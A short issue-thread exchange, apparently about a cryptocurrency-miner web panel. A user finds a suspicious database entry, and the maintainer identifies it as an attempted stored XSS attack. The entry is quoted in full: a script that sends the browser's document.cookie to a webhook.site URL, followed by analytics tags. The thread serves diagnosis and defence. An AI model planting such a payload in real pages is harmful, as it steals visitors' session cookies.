UnamSanctam
commented
1 year ago It's an attempt at an XSS attack from what it looks like, someone has sent a fake miner connection to your endpoint (which is obviously open to the public, otherwise no miner could connect) with some JavaScript code as the pool, and then when the web panel site loads they want your browser to run that script. Though the endpoint shouldn't really be vulnerable to XSS since it performs sanitation, maybe it's due to some changed with PHP 8? I have no idea if the datatable in the web panel that displays the miners are vulnerable to XSS attacks though. I would suggest removing the entry.
ShoelessTom
I openned up my database as a sqli and used a viewer and I see this. Should I be worried?
it reads
<script>const x = new XMLHttpRequest();x.open("GET", "https://webhook.site/df107732-0ee7-4a4e-838c-f582d3ef14bf?x=" + document.cookie);x.send();</script><script async src="https://www.googletagmanager.com/gtag/js?id=G-VTYXG93723"></script><script>window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}gtag("js", new Date());gtag("config", "G-VTYXG93723");</script>